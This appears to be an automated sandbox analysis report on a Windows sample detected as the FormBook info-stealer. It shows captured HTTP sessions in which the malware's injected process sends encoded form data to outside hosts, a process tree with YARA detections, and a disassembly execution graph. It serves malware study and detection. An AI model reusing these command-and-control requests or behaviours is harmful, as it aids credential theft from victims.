1ZqD=ons/e4I9ezgPwc60LSGue2Q1WaxOPJWrz54/wAr/1Nys3fFaYRJKr8jm0z/8BYDNire1jrnYAC4rZmfJ9tNTPZGCWhgovAdVXVlO8gf700erF5kh3lCvTjInyZNDUFu4yb0dlWkA8aN4ooUME5H6meFMZ/wd3mD9/IQ8J0fXnTk4Oti++ynPp3+DLaP5g1TwbNrfjuQyYv9FuOUn2F1LxpkosDPjtvOnrzwUcmjqQ0mOJKdOceE681VaGC3wj+rabn3v/DlK9SUTSSKs18ZhdWc/VneyBt5DSoyUf/snVCDB8HLKB4pK8lNL7QzXKEooAcHB/yQORE94uDCbqhMQGCYIKlQLPEehmzWiYDdEDllrQ4yUbw74IgS/swAi/8ZnqTxlLd2VTkXVIQjYGqzPJUzZKSnqCaGR/UFNSkkwwXEtIRL7pysyFknn7tmxSl6t6ttcvYO2XQZb7aXJTz46vD8AARezpzBhhkujDhj0palLku4a7wjH/CU53t0Sqfgg5d6E4XmJBLWYiYB+NpptkUKqUz/rSr5mQfI+IElfUV7eEo8V62k2zZVEc9BhnSNw8ap0dcU3I+iIjhIG957bmWxf4VgN+KQLaE0W2lWpKLUIFk5iZkKdK4nC1AVL6uTk71cV0DqTxzcpfv5CgNNjZKre+td9e10IJDIN4SEm+Wr3BjLMum8E+30JNTJXZb/joTeDFuwizDt9ZZJyXt1wDqYV/R7yaBrCPRogAAKmg9zaz8no1rU2a3Ic9AZvDAyi/9ck9TMFaa6YTvIm5a0i0XLkE+Nebu81+V8w77upKVj/jAmhjHbe7W0ajEMRR1+C9NeFKb6LunRnlW7xefviEcIRGMIixl6wwUYNwM+QR/o1DbPUZaQXJGhDVmGtTjfdUob04gU6WYrYSVxdKBs+eF6eDs+UqYPBgkDfDPJbD538UfxgwjxskI20NJ6Eyw0us9Se2FGwC+CoxQ/qUF62XmspNcN6XZvQ868ntqoiqf8xREh [TRUNCATED]
                                                                    Jan 11, 2025 06:33:27.927623034 CET549INHTTP/1.1 400
                                                                    Server: ZGS
                                                                    Date: Sat, 11 Jan 2025 05:33:27 GMT
                                                                    Content-Type: text/html;charset=ISO-8859-1
                                                                    Content-Length: 80
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=d2341ff8556820e5fe7583c4c06e32ae; Path=/
                                                                    Set-Cookie: csrfc=ac5e5068-c606-448c-bb18-e7f860599f9f;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=ac5e5068-c606-448c-bb18-e7f860599f9f;path=/;SameSite=Strict;priority=high
                                                                    Set-Cookie: JSESSIONID=D9287213F14402682A4C7F212B38524D; Path=/; HttpOnly
                                                                    Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a
                                                                    Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.849741136.143.186.12805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:33:29.892448902 CET515OUTGET /m8yb/?1ZqD=llEfdMF3fC5v4v2APCHuOWcZRuF4MZ+X2MJb9QaOtduFh6ZmbzwgisfO5x3/A5+hir6Uv7mlcSwuThCcifsMM+utKUlvw3RLEUBt7B2DyxaXSuE2zij4fUwZyaVVEgXhww==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.lanxuanz.tech
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:33:30.481340885 CET1236INHTTP/1.1 404
                                                                    Server: ZGS
                                                                    Date: Sat, 11 Jan 2025 05:33:30 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 4641
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
                                                                    Set-Cookie: csrfc=e5167ea5-e077-4538-b2be-e221d027850e;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=e5167ea5-e077-4538-b2be-e221d027850e;path=/;SameSite=Strict;priority=high
                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                    vary: accept-encoding
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50
                                                                    Jan 11, 2025 06:33:30.481381893 CET1236INData Raw: 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a
                                                                    Data Ascii: %, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin
                                                                    Jan 11, 2025 06:33:30.481394053 CET1236INData Raw: 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 3b 0a 20 20 20 20
                                                                    Data Ascii: h3{ font-size:18px; font-family: "Open Sans"; font-weight:normal; font-weight:600; } .weight400{ font-weight:400; } .domain-color{
                                                                    Jan 11, 2025 06:33:30.481417894 CET1236INData Raw: 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b
                                                                    Data Ascii: rgba(0, 0, 0, 0.12); color: #ffffff; font-size: 18px; font-weight: 300; padding: 10px 20px; text-decoration: none; position:relative; } </style
                                                                    Jan 11, 2025 06:33:30.481427908 CET223INData Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 77 69 64 74 68 3d 22 37 30 30 70 78 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 7a 6f 68 6f 2e 63 6f 6d 2f 73 69 74 65
                                                                    Data Ascii: container"> <img width="700px" src="https://www.zoho.com/sites/images/professionally-crafted-themes.png" style="margin-top: 15px"> </div> </div> </div> </body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.849742199.192.21.169805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:33:36.068542957 CET784OUTPOST /pcck/ HTTP/1.1
                                                                    Host: www.astrafusion.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.astrafusion.xyz
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.astrafusion.xyz/pcck/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 78 6c 30 55 45 63 70 6c 67 6f 58 63 51 5a 39 74 6a 6f 67 67 43 64 51 2b 72 47 70 69 74 71 65 30 65 53 63 39 76 68 54 4c 66 43 79 53 48 65 69 55 53 6b 30 39 41 52 63 6b 67 4f 36 5a 79 6d 6e 30 45 54 68 55 55 44 63 65 4e 7a 4c 77 50 52 61 6a 6e 73 72 68 33 4f 74 4a 66 70 43 2b 7a 53 51 6f 6f 65 52 67 54 58 45 57 2b 79 79 43 4b 4f 68 55 6a 48 4c 2b 6a 74 68 34 72 50 68 53 48 74 4f 2b 41 68 77 4d 74 46 6e 75 73 6c 6f 42 53 49 64 67 58 2b 4e 65 50 58 41 38 31 31 4a 55 5a 34 57 6e 39 39 35 78 56 36 76 54 37 62 6b 2b 47 35 78 69 53 4b 57 39 47 78 35 74 75 46 43 6e 4c 52 32 59 31 51 39 55 4f 48 6f 3d
                                                                    Data Ascii: 1ZqD=xl0UEcplgoXcQZ9tjoggCdQ+rGpitqe0eSc9vhTLfCySHeiUSk09ARckgO6Zymn0EThUUDceNzLwPRajnsrh3OtJfpC+zSQooeRgTXEW+yyCKOhUjHL+jth4rPhSHtO+AhwMtFnusloBSIdgX+NePXA811JUZ4Wn995xV6vT7bk+G5xiSKW9Gx5tuFCnLR2Y1Q9UOHo=
                                                                    Jan 11, 2025 06:33:36.708457947 CET918INHTTP/1.1 404 Not Found
                                                                    Date: Sat, 11 Jan 2025 05:33:36 GMT
                                                                    Server: Apache
                                                                    Content-Length: 774
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:00:30:31
                                                                    Start date:11/01/2025
                                                                    Path:C:\Users\user\Desktop\plZuPtZoTk.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\plZuPtZoTk.exe"
                                                                    Imagebase:0x9c0000
                                                                    File size:1'272'832 bytes
                                                                    MD5 hash:03473468FD10D42DD617A426DCFFA92D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:00:30:33
                                                                    Start date:11/01/2025
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\plZuPtZoTk.exe"
                                                                    Imagebase:0xe10000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:00:31:10
                                                                    Start date:11/01/2025
                                                                    Path:C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe"
                                                                    Imagebase:0x660000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:5
                                                                    Start time:00:31:12
                                                                    Start date:11/01/2025
                                                                    Path:C:\Windows\SysWOW64\clip.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\clip.exe"
                                                                    Imagebase:0xd60000
                                                                    File size:24'576 bytes
                                                                    MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:8
                                                                    Start time:00:31:25
                                                                    Start date:11/01/2025
                                                                    Path:C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe"
                                                                    Imagebase:0x660000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:10
                                                                    Start time:00:31:37
                                                                    Start date:11/01/2025
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff6d20e0000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:3%
                                                                      Dynamic/Decrypted Code Coverage:2.2%
                                                                      Signature Coverage:3.2%
                                                                      Total number of Nodes:1856
                                                                      Total number of Limit Nodes:54
                                                                      execution_graph 96848 a13a41 96852 a310c0 96848->96852 96850 a13a4c 96851 a310c0 53 API calls 96850->96851 96851->96850 96857 a310fa 96852->96857 96859 a310cd 96852->96859 96853 a310fc 96896 9dfa11 53 API calls 96853->96896 96855 a31101 96863 9c7510 96855->96863 96857->96850 96859->96853 96859->96855 96859->96857 96861 a310f4 96859->96861 96895 9cb270 39 API calls 96861->96895 96864 9c7525 96863->96864 96865 9c7522 96863->96865 96866 9c752d 96864->96866 96867 9c755b 96864->96867 96886 9c6350 96865->96886 96897 9e51c6 26 API calls 96866->96897 96869 a050f6 96867->96869 96872 9c756d 96867->96872 96877 a0500f 96867->96877 96926 9e5183 26 API calls 96869->96926 96870 9c753d 96898 9dfddb 96870->96898 96914 9dfb21 51 API calls 96872->96914 96873 a0510e 96873->96873 96879 a05088 96877->96879 96915 9dfe0b 96877->96915 96878 9c7547 96908 9c9cb3 96878->96908 96925 9dfb21 51 API calls 96879->96925 96882 a05058 96883 9dfddb 22 API calls 96882->96883 96884 a0507f 96883->96884 96885 9c9cb3 22 API calls 96884->96885 96885->96879 96887 a04a51 96886->96887 96888 9c6362 96886->96888 96952 9c4a88 22 API calls __fread_nolock 96887->96952 96942 9c6373 96888->96942 96891 9c636e 96891->96857 96892 a04a5b 96893 a04a67 96892->96893 96953 9ca8c7 96892->96953 96895->96857 96896->96855 96897->96870 96902 9dfde0 96898->96902 96900 9dfdfa 96900->96878 96902->96900 96904 9dfdfc 96902->96904 96927 9eea0c 96902->96927 96934 9e4ead 7 API calls 2 library calls 96902->96934 96903 9e066d 96936 9e32a4 RaiseException 96903->96936 96904->96903 96935 9e32a4 RaiseException 96904->96935 96907 9e068a 96907->96878 96909 9c9cc2 _wcslen 96908->96909 96910 9dfe0b 22 API calls 96909->96910 96911 9c9cea __fread_nolock 96910->96911 96912 9dfddb 22 API calls 96911->96912 96913 9c9d00 96912->96913 96913->96865 96914->96870 96918 9dfddb 96915->96918 96916 9eea0c ___std_exception_copy 21 API calls 96916->96918 96917 9dfdfa 96917->96882 96918->96916 96918->96917 96920 9dfdfc 96918->96920 96939 9e4ead 7 API calls 2 library calls 96918->96939 96921 9e066d 96920->96921 96940 9e32a4 RaiseException 96920->96940 96941 9e32a4 RaiseException 96921->96941 96924 9e068a 96924->96882 96925->96869 96926->96873 96933 9f3820 _abort 96927->96933 96928 9f385e 96938 9ef2d9 20 API calls _abort 96928->96938 96930 9f3849 RtlAllocateHeap 96931 9f385c 96930->96931 96930->96933 96931->96902 96933->96928 96933->96930 96937 9e4ead 7 API calls 2 library calls 96933->96937 96934->96902 96935->96903 96936->96907 96937->96933 96938->96931 96939->96918 96940->96921 96941->96924 96944 9c6382 96942->96944 96949 9c63b6 __fread_nolock 96942->96949 96943 a04a82 96946 9dfddb 22 API calls 96943->96946 96944->96943 96945 9c63a9 96944->96945 96944->96949 96957 9ca587 96945->96957 96948 a04a91 96946->96948 96950 9dfe0b 22 API calls 96948->96950 96949->96891 96951 a04ac5 __fread_nolock 96950->96951 96952->96892 96954 9ca8db 96953->96954 96956 9ca8ea __fread_nolock 96953->96956 96955 9dfe0b 22 API calls 96954->96955 96954->96956 96955->96956 96956->96893 96958 9ca59d 96957->96958 96961 9ca598 __fread_nolock 96957->96961 96959 9dfe0b 22 API calls 96958->96959 96960 a0f80f 96958->96960 96959->96961 96960->96960 96961->96949 96962 a12a00 96977 9cd7b0 ISource 96962->96977 96963 9cdb11 PeekMessageW 96963->96977 96964 9cd807 GetInputState 96964->96963 96964->96977 96965 a11cbe TranslateAcceleratorW 96965->96977 96967 9cdb8f PeekMessageW 96967->96977 96968 9cda04 timeGetTime 96968->96977 96969 9cdb73 TranslateMessage DispatchMessageW 96969->96967 96970 9cdbaf Sleep 96984 9cdbc0 96970->96984 96971 a12b74 Sleep 96971->96984 96972 a11dda timeGetTime 97143 9de300 23 API calls 96972->97143 96973 9de551 timeGetTime 96973->96984 96976 a12c0b GetExitCodeProcess 96980 a12c21 WaitForSingleObject 96976->96980 96981 a12c37 CloseHandle 96976->96981 96977->96963 96977->96964 96977->96965 96977->96967 96977->96968 96977->96969 96977->96970 96977->96971 96977->96972 96983 9cd9d5 96977->96983 96994 9cdd50 96977->96994 97001 9cdfd0 96977->97001 97024 9d1310 96977->97024 97080 9dedf6 96977->97080 97085 9cbf40 96977->97085 97144 a33a2a 23 API calls 96977->97144 97145 9cec40 96977->97145 97169 a3359c 82 API calls __wsopen_s 96977->97169 96978 a529bf GetForegroundWindow 96978->96984 96980->96977 96980->96981 96981->96984 96982 a12a31 96982->96983 96984->96973 96984->96976 96984->96977 96984->96978 96984->96982 96984->96983 96985 a12ca9 Sleep 96984->96985 97170 a45658 23 API calls 96984->97170 97171 a2e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96984->97171 97172 a2d4dc 47 API calls 96984->97172 96985->96977 96995 9cdd6f 96994->96995 96996 9cdd83 96994->96996 97173 9cd260 235 API calls 2 library calls 96995->97173 97174 a3359c 82 API calls __wsopen_s 96996->97174 96998 9cdd7a 96998->96977 97000 a12f75 97000->97000 97002 9ce010 97001->97002 97018 9ce0dc ISource 97002->97018 97177 9e0242 5 API calls __Init_thread_wait 97002->97177 97005 a12fca 97005->97018 97178 9ca961 97005->97178 97006 9ca961 22 API calls 97006->97018 97008 a3359c 82 API calls 97008->97018 97013 a12fee 97184 9e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97013->97184 97016 9cec40 235 API calls 97016->97018 97018->97006 97018->97008 97018->97016 97019 9ca8c7 22 API calls 97018->97019 97020 9ce3e1 97018->97020 97021 9d04f0 22 API calls 97018->97021 97175 9ca81b 41 API calls 97018->97175 97176 9da308 235 API calls 97018->97176 97185 9e0242 5 API calls __Init_thread_wait 97018->97185 97186 9e00a3 29 API calls __onexit 97018->97186 97187 9e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97018->97187 97188 a447d4 235 API calls 97018->97188 97189 a468c1 235 API calls 97018->97189 97019->97018 97020->96977 97021->97018 97025 9d1376 97024->97025 97026 9d17b0 97024->97026 97028 a16331 97025->97028 97029 9d1390 97025->97029 97309 9e0242 5 API calls __Init_thread_wait 97026->97309 97030 a1633d 97028->97030 97314 a4709c 235 API calls 97028->97314 97190 9d1940 97029->97190 97030->96977 97032 9d17ba 97035 9d17fb 97032->97035 97037 9c9cb3 22 API calls 97032->97037 97039 a16346 97035->97039 97041 9d182c 97035->97041 97036 9d1940 9 API calls 97038 9d13b6 97036->97038 97045 9d17d4 97037->97045 97038->97035 97040 9d13ec 97038->97040 97315 a3359c 82 API calls __wsopen_s 97039->97315 97040->97039 97063 9d1408 __fread_nolock 97040->97063 97311 9caceb 23 API calls ISource 97041->97311 97044 9d1839 97312 9dd217 235 API calls 97044->97312 97310 9e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97045->97310 97048 a1636e 97316 a3359c 82 API calls __wsopen_s 97048->97316 97049 9d152f 97051 a163d1 97049->97051 97052 9d153c 97049->97052 97318 a45745 54 API calls _wcslen 97051->97318 97053 9d1940 9 API calls 97052->97053 97055 9d1549 97053->97055 97060 9d1940 9 API calls 97055->97060 97065 9d15c7 ISource 97055->97065 97056 9dfddb 22 API calls 97056->97063 97057 9dfe0b 22 API calls 97057->97063 97058 9d1872 97313 9dfaeb 23 API calls 97058->97313 97059 9d171d 97059->96977 97066 9d1563 97060->97066 97063->97044 97063->97048 97063->97049 97063->97056 97063->97057 97064 9cec40 235 API calls 97063->97064 97063->97065 97069 a163b2 97063->97069 97064->97063 97065->97058 97067 9d167b ISource 97065->97067 97068 9d1940 9 API calls 97065->97068 97200 a4959f 97065->97200 97203 a36ef1 97065->97203 97283 9c4f39 97065->97283 97289 a31e96 